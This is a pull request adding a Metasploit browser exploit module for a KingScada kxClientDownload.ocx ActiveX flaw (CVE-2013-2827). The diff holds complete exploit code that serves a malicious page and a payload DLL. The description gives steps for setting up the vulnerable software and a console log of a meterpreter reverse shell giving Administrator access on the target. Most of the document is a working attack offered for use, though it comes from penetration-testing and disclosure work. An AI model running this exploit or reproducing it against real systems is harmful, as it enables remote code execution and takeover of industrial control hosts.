### PR TITLE
Add module for ZDI-14-011

### DIFF
--- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
+++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
@@ -1,0 +1,93 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'KingScada kxClientDownload.ocx ActiveX Remote Code Execution',
+      'Description'    => %q{
+        This module abuses the kxClientDownload.ocx distributed with WellingTech KingScada.
+        The ProjectURL property can be abused to download and load arbitrary DLLs from
+        arbitrary locations, leading to arbitrary code execution, because of a dangerous
+        usage of LoadLibrary. Due to the nature of the vulnerability, this module will work
+        only when there isn't Protected Mode.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Andrea Micalizzi',  # aka rgod original discovery
+          'juan vazquez'       # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2013-2827'],
+          ['OSVDB', '102135'],
+          ['BID', '64941'],
+          ['ZDI', '14-011'],
+          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01']
+        ],
+      'DefaultOptions' =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+        },
+      'BrowserRequirements' =>
+        {
+          :source      => /script|headers/i,
+          :os_name     => Msf::OperatingSystems::WINDOWS,
+          :ua_name     => /MSIE|KXCLIE/i
+        },
+      'Payload'        =>
+        {
+          'Space'           => 2048,
+          'StackAdjustment' => -3500,
+          'DisableNopes'    => true
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 14 2014'))
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Requested: #{request.uri}")
+
+    if request.uri =~ /\/libs\/.*\.dll/
+      print_good("Sending DLL payload")
+      send_response(cli,
+        generate_payload_dll(:code => get_payload(cli, target_info)),
+        'Content-Type' => 'application/octet-stream'
+      )
+      return
+    elsif request.uri =~ /\/libs\//
+      print_status("Sending not found")
+      send_not_found(cli)
+      return
+    end
+
+    content = <<-EOS
+<html>
+<body>
+<object classid='clsid:1A90B808-6EEF-40FF-A94C-D7C43C847A9F' id='#{rand_text_alpha(10 + rand(10))}'>
+<param name="ProjectURL" value="#{get_module_uri}"></param>
+</object>
+</body>
+</html>
+    EOS
+
+    print_status("Sending #{self.name}")
+    send_response_html(cli, content)
+  end
+
+end


### PR DESCRIPTION
Module for ZDI-14-011. Tested successfully on Windows XP SP3 / IE6 -IE8 or Windows7 IE8 with protection mode disabled :\ weird....
## Verification Steps
- [x] Download and install vulnerable http://www.kingview.com/en/downloads/Downloads/KingSCADA3.1.rar (at least is vulnerable at the time of writing, let me know if the things change and I can share installer)
- [x] register the vulnerable activex control, installed on `C:\Program Files\KingSCADA\bin\ClientLib\libs` with `regsvr32 kxClientDownload.ocx`
- [x] Run the module like in the demo, visit the page pointed by the module, hopefully enjoy sessions. Remember to use a IE without Protected Mode, for example IE8 Windows XP SP3. 

```
msf > use exploit/windows/browser/wellintech_kingscada_kxclientdownload 
msf exploit(wellintech_kingscada_kxclientdownload) > set srvhost 192.168.172.1
srvhost => 192.168.172.1
msf exploit(wellintech_kingscada_kxclientdownload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(wellintech_kingscada_kxclientdownload) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(wellintech_kingscada_kxclientdownload) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] Using URL: http://192.168.172.1:8080/1c2FFAXOAyg2t
[*] Server started.
msf exploit(wellintech_kingscada_kxclientdownload) > [*] 192.168.172.244  wellintech_kingscada_kxclientdownload - Gathering target information.
[*] 192.168.172.244  wellintech_kingscada_kxclientdownload - Requested: /1c2FFAXOAyg2t/CUjXHb/
[*] 192.168.172.244  wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] 192.168.172.244  wellintech_kingscada_kxclientdownload - Requested: /1c2FFAXOAyg2t/CUjXHb/libs/kxClientDownloadRes1033.dll.htm
[+] Sending DLL payload
[*] 192.168.172.244  wellintech_kingscada_kxclientdownload - Requested: /1c2FFAXOAyg2t/CUjXHb/libs/vcredistsp1_x86_en.exe.htm
[*] 192.168.172.244  wellintech_kingscada_kxclientdownload - Sending not found
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.244:1237) at 2014-02-06 18:27:46 -0600
[*] Session ID 1 (192.168.172.1:4444 -> 192.168.172.244:1237) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: rundll32.exe (2732)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2968
[+] Successfully migrated to process 

msf exploit(wellintech_kingscada_kxclientdownload) > sessions 

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  JUAN-C0DE875735\Administrator @ JUAN-C0DE875735  192.168.172.1:4444 -> 192.168.172.244:1237 (192.168.172.244)

msf exploit(wellintech_kingscada_kxclientdownload) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
smeterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
```
